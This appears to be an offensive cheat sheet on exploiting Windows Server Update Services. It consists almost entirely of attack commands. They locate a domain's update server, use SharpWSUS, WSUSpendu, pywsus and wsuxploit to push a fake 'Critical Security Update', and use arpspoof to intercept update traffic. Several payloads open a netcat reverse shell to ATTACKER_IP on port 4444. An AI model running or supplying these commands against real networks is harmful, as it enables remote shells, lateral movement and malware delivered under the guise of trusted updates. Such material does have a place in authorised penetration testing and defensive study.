WSUS Exploitation

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v WUServer
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v UseWUServer

(Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" -Name WUServer).WUServer

https://github.com/nettitude/SharpWSUS

SharpWSUS.exe create /payload:"C:\Windows\Temp\nc.exe" /args:"-e cmd.exe ATTACKER_IP 4444" /title:"Critical Security Update"

SharpWSUS.exe approve /updateid:<UPDATE_GUID> /computername:TARGET.domain.local /groupname:"Critical Updates"

SharpWSUS.exe check /updateid:<UPDATE_GUID> /computername:TARGET.domain.local

SharpWSUS.exe delete /updateid:<UPDATE_GUID>

https://github.com/AlsidOfficial/WSUSpendu

python3 WSUSpendu.py -c "C:\Windows\System32\cmd.exe" -a "/c C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444" -t TARGET

https://github.com/GoSecure/pywsus

# ARP spoof
arpspoof -i eth0 -t TARGET WSUS_SERVER
arpspoof -i eth0 -t WSUS_SERVER TARGET

# Run PyWSUS
python3 pywsus.py --host ATTACKER_IP --port 8530 --executable payload.exe

https://github.com/pimps/wsuxploit

python3 wsuxploit.py -t TARGET_IP -e payload.exe -w WSUS_IP